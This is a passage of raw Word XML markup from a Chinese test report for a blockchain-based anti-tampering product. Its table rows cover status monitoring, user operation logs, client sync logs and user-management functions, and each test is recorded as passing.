                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看历史版本，停用、启用目录成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5517987B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DBD49EF"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51CA331C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05418253" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="342" w:name="_Toc36487953"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态监控模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="342"/>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2276F316" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D316340"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2AB95176" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>状态监控模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="7F357909" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="485856F4"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000C9ED1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4257B9B8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4171488E"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31F941A2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5E9BCCA5" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A7CA7D4"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5B3F3DA4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="8lab-Char0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rStyle w:val="8lab-Char0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>查看目标</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rStyle w:val="8lab-Char0"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>主机上的服务状态，运行状态包括正常和心跳超时等。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="242C9D50" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4091F378" wp14:editId="3A3617F0">
                  <wp:extent cx="4197350" cy="1362710"/>
                  <wp:effectExtent l="0" t="0" r="19050" b="8890"/>
                  <wp:docPr id="5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77"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4197350" cy="1362710"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="05ED8F01" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A06B3D4"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0E2D9659" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6625AE1B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0593D576"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1370B6E8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E953B1E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="343" w:name="_Toc36487954"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户操作日志</w:t>
      </w:r>
      <w:bookmarkEnd w:id="343"/>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57B60B01" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E09CAA9"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68B08A49" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户操作日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1222DC7B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DD10232"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564E3A63" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="532D7CCF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E711F77"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34D10EB1"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5D3A0701" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1319E93E"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6415B368" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>代码仓库服务的</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>操作日志查看功能。主要包含用户的启动/暂停根目录保护，新增、删除、移动和重命名等操作记录。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F908C5A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57651DEE"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="484127C1" wp14:editId="069F0197">
                  <wp:extent cx="4194810" cy="1682115"/>
                  <wp:effectExtent l="0" t="0" r="21590" b="19685"/>
                  <wp:docPr id="5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78"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4194810" cy="1682115"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="00205513" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="162B9F83"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22931884"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Style w:val="8lab-Char0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="537EE62D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="736C7A90"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23A6DD27" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4651315A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="344" w:name="_Toc36487955"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>同步</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34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409328C0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33DF1DD7"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11889A46" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>客户端防</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>同步</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="32CA99F3" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="688F25DD"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56AC8080" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="09687CF4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2180C4E3"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640E087D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0683F27A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="088E5271"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56FD7C8F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查看</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>目标主机上被保护目录的篡改操作。监控的篡改包括新增、删除、修改和移动目录或文件的4类篡改操作。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55A06D0A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="11EA7FF7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EF9DDA2"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22B842E1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="68950636" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C3BF27B"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52D24B06" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="381C2813" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="345" w:name="_Toc36487956"/>
      <w:r w:rsidRPr="00536672">
        <w:t>用户管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="345"/>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4C044834" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B3A2E4E"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720F3229" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4C82E653" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B52CFBA"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12F7EE6F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="29714663" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54CADB5D"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054E5721" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="47DCE849" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79A5FCAF"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6FDBB2AB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1、停用、启用账号</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A6235F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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D0CB59B" wp14:editId="0B9FB42F">
                  <wp:extent cx="4201795" cy="2243455"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="17145"/>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9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2243455"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="04BC4714" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:num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用户详情</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45FF8CA7"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08D01D62" wp14:editId="3303F5D2">
                  <wp:extent cx="4201795" cy="2234565"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="635"/>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0"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2234565"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="77C3B9F5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:num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新建根目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AC1DD4C"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39FA3C20" wp14:editId="4FE1725D">
                  <wp:extent cx="4201795" cy="2061845"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="20955"/>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1"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4201795" cy="2061845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
